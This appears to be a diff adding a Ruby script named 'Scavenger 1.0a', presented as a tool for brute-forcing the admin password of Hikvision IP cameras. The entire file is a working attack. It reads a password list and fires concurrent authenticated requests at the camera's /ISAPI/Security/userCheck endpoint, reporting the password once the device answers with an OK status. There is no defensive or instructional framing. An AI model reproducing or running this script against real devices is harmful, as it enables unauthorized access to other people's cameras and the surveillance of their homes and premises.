|
| 1 | +#!/usr/bin/ruby |
| 2 | + |
| 3 | +################################################################################################### |
| 4 | +#Author : Shankar Damodaran # |
| 5 | +#Codename : Scavenger 1.0a # |
| 6 | +#Description : A brute force script that attempts to break in Hikvision IP Camera Routers # |
| 7 | +################################################################################################### |
| 8 | + |
| 9 | + |
| 10 | +require 'typhoeus' |
| 11 | +require 'colorize' |
| 12 | + |
| 13 | + |
| 14 | +######### Configuration Begins ######## |
| 15 | + |
| 16 | +### Subject your target ip address ### |
| 17 | +target = 'targetipaddressoftherouter' |
| 18 | + |
| 19 | +### Provide the password list ### |
| 20 | +file_path = 'pathtoyourpasswordlist' |
| 21 | + |
| 22 | +######## Configuration Ends ########## |
| 23 | + |
| 24 | + |
| 25 | +passwords = [] # The passwords list container |
| 26 | + |
| 27 | + |
| 28 | +puts "Initializing the password list. Please wait..."; |
| 29 | + |
| 30 | +# Reading the passwords from the list, cleaning up and storing it in the array. |
| 31 | +def read_array(file_path,passwords) |
| 32 | + File.readlines(file_path).map do |line| |
| 33 | + passwords << line.unpack("C*").pack("U*").strip |
| 34 | + end |
| 35 | +end |
| 36 | + |
| 37 | +# The actual call to the above method |
| 38 | +read_array(file_path,passwords) |
| 39 | + |
| 40 | + |
| 41 | + |
| 42 | +time = Time.new |
| 43 | + |
| 44 | +totpasswords = passwords.length |
| 45 | + |
| 46 | +puts "\n#{totpasswords} passwords loaded. \nBruteforce Sequence Initialization Started at #{time.inspect}" |
| 47 | + |
| 48 | + |
| 49 | +# Chopping the array in certain sets to fasten up parallelization |
| 50 | +new_pass = passwords.each_slice((totpasswords/2).round).to_a |
| 51 | + |
| 52 | + |
| 53 | + |
| 54 | +# The module that does the parallelization using Typhoeus Hydra |
| 55 | +def multi_channel_split(target,req,passwords) |
| 56 | + |
| 57 | + i=0 |
| 58 | + j=0 |
| 59 | + |
| 60 | + # The default concurrency is 200, I had it set to 20. Try increasing this parameter to experiment variety of speed. |
| 61 | + hydra = Typhoeus::Hydra.new(max_concurrency: 20) |
| 62 | + |
| 63 | + # I am setting the verbosity and memoisation to 0. Memoisation should be set to false for calls with different set of parameters. |
| 64 | + Typhoeus.configure do |config| |
| 65 | + config.verbose = false |
| 66 | + config.memoize = false |
| 67 | + end |
| 68 | + |
| 69 | + requests = req.times.map { |
| 70 | + request = Typhoeus::Request.new("http://#{target}/ISAPI/Security/userCheck", |
| 71 | + method: :get, |
| 72 | + userpwd: "admin:#{passwords[i]}") |
| 73 | + i+=1 |
| 74 | + hydra.queue(request) |
| 75 | + request |
| 76 | + |
| 77 | + } |
| 78 | + |
| 79 | + # Running Hydra every once after piling up the requests from the slice |
| 80 | + hydra.run |
| 81 | + |
| 82 | + |
| 83 | + responses = requests.map { |request| |
| 84 | + # If we get a response similar to this means the password has found. |
| 85 | + if request.response.body.index('<statusString>OK</statusString>') != nil |
| 86 | + time = Time.new |
| 87 | + puts "\nPassword Found at #{time.inspect}!: #{passwords[j]} \n".green |
| 88 | + abort |
| 89 | + |
| 90 | + end |
| 91 | + j+=1 |
| 92 | + |
| 93 | + |
| 94 | + } |
| 95 | + |
| 96 | + |
| 97 | +end |
| 98 | + |
| 99 | +# The chopped array is subjected here to call the module. |
| 100 | +new_pass.each do |req| |
| 101 | + multi_channel_split(target,req.length,req) |
| 102 | + |
| 103 | +end |
| 104 | + |
| 105 | +puts "\nPassword was not found in this list. Subject another file to start a new operation.".red |
| 106 | +#################################################################################################### |
0 commit comments